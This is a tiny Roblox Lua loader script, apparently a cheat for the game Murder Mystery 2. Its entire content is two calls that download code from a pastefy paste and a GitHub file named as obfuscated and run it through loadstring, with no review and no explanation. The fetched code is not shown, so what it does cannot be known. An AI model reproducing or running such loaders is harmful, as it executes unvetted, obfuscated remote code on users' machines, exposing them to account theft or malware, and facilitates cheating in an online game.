task.spawn(function()
	loadstring(game:HttpGet("https://pastefy.app/S1R0mKhg/raw", true))()
end)
task.spawn(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/XenaScripts/murdermyster2.xenav2/refs/heads/main/ScriptV2_obfuscated.lua", true))()
end)
